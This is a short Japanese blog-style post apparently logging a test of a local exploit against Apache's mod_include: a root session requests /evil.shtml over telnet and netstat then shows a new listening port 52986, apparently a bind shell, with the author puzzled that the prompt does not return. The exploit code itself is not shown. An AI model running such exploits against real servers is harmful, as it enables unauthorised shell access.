Apache mod_include のlocal exploit
[root@rh htdocs]# telnet localhost 80 Trying 127.0.0.1... Connected to rh (127.0.0.1). Escape character is '^]'. GET /evil.shtml HTTP/1.0 # しばらく待つ… Connection closed by foreign host. [root@rh htdocs]#netstat -an|grep 52986 tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN [root@rh htdocs]# |
プロンプトが返ってこないなぁ…。
うーむ。